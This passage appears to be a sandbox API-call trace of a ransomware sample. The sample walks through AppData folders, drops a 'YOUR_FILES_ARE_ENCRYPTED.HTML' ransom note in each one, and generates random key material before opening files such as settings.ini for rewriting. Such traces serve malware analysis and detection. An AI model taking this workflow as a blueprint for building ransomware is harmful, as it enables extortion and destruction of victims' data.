| out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization") returned 65 [0110.627] GetProcessHeap () returned 0x600000 [0110.627] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.628] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization" [0110.628] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\*" [0110.628] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c2e0, dwReserved1=0x628c50, cFileName=".", cAlternateFileName="")) returned 0x626838 [0110.628] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c2e0, dwReserved1=0x628c50, cFileName="..", cAlternateFileName="")) returned 1 [0110.628] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c2e0, dwReserved1=0x628c50, cFileName="TrainedDataStore", cAlternateFileName="TRAINE~1")) returned 1 [0110.628] StrStrIW (lpFirst="TrainedDataStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.628] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore") returned 82 [0110.628] GetProcessHeap () returned 0x600000 [0110.628] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.629] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore" [0110.629] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*" [0110.629] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.629] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.629] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 0 [0110.629] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.629] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0110.629] GetProcessHeap () returned 0x600000 [0110.629] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\traineddatastore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0110.630] WriteFile (in: hFile=0x32c, lpBuffer=0x3184de8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3184de8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0110.631] CloseHandle (hObject=0x32c) returned 1 [0110.633] GetProcessHeap () returned 0x600000 [0110.633] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.633] GetProcessHeap () returned 0x600000 [0110.633] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.634] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c2e0, dwReserved1=0x628c50, cFileName="TrainedDataStore", cAlternateFileName="TRAINE~1")) returned 0 [0110.634] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0110.634] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0110.635] GetProcessHeap () returned 0x600000 [0110.635] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0110.635] WriteFile (in: hFile=0x30c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0110.636] CloseHandle (hObject=0x30c) returned 1 [0110.636] GetProcessHeap () returned 0x600000 [0110.636] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.636] GetProcessHeap () returned 0x600000 [0110.636] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.637] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c8e, dwReserved1=0x628c48, cFileName="Windows", cAlternateFileName="")) returned 1 [0110.637] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x377dee7, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x377dee7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c8e, dwReserved1=0x628c48, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0110.637] StrStrIW (lpFirst="Windows Sidebar", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.638] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar") returned 60 [0110.638] GetProcessHeap () returned 0x600000 [0110.638] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.638] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar" [0110.639] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*" [0110.639] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x377dee7, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x377dee7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c2e0, dwReserved1=0x628c50, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0110.639] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x377dee7, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x377dee7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c2e0, dwReserved1=0x628c50, cFileName="..", cAlternateFileName="")) returned 1 [0110.639] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c2e0, dwReserved1=0x628c50, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0110.639] StrStrIW (lpFirst="Gadgets", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.639] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned 68 [0110.640] GetProcessHeap () returned 0x600000 [0110.640] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.640] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" [0110.640] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*" [0110.640] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d4ca, dwReserved1=0x63d450, cFileName=".", cAlternateFileName="")) returned 0x626838 [0110.640] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d4ca, dwReserved1=0x63d450, cFileName="..", cAlternateFileName="")) returned 1 [0110.640] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d4ca, dwReserved1=0x63d450, cFileName="..", cAlternateFileName="")) returned 0 [0110.640] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0110.641] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0110.641] GetProcessHeap () returned 0x600000 [0110.641] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0110.641] WriteFile (in: hFile=0x32c, lpBuffer=0x3184de8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3184de8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0110.642] CloseHandle (hObject=0x32c) returned 1 [0110.643] GetProcessHeap () returned 0x600000 [0110.643] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.643] GetProcessHeap () returned 0x600000 [0110.643] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.643] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x377dee7, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x973d55c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x973d55c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x63c2e0, dwReserved1=0x628c50, cFileName="settings.ini", cAlternateFileName="")) returned 1 [0110.643] StrStrIW (lpFirst="settings.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.643] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini") returned 73 [0110.643] PathFindExtensionW (pszPath="settings.ini") returned=".ini" [0110.643] lstrlenW (lpString=".ini") returned 4 [0110.643] PathFindExtensionW (pszPath="settings.ini") returned=".ini" [0110.643] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0110.644] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=80) returned 1 [0110.644] CloseHandle (hObject=0x32c) returned 1 [0110.644] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x377dee7, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x973d55c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x973d55c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x63c2e0, dwReserved1=0x628c50, cFileName="settings.ini", cAlternateFileName="")) returned 0 [0110.644] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0110.645] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0110.645] GetProcessHeap () returned 0x600000 [0110.645] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0110.645] WriteFile (in: hFile=0x30c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0110.646] CloseHandle (hObject=0x30c) returned 1 [0110.646] GetProcessHeap () returned 0x600000 [0110.646] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.647] GetProcessHeap () returned 0x600000 [0110.647] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.648] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x377dee7, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x377dee7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c8e, dwReserved1=0x628c48, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0110.648] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.648] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0110.648] GetProcessHeap () returned 0x600000 [0110.648] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0110.662] WriteFile (in: hFile=0x308, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0110.663] CloseHandle (hObject=0x308) returned 1 [0110.664] GetProcessHeap () returned 0x600000 [0110.664] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.664] GetProcessHeap () returned 0x600000 [0110.664] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.665] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c18, cFileName="Temp", cAlternateFileName="")) returned 1 [0110.665] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.665] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp") returned 39 [0110.665] GetProcessHeap () returned 0x600000 [0110.665] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.666] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp" [0110.666] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*" [0110.666] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c8e, dwReserved1=0x628c48, cFileName=".", cAlternateFileName="")) returned 0x626878 [0110.666] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c8e, dwReserved1=0x628c48, cFileName="..", cAlternateFileName="")) returned 1 [0110.666] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, 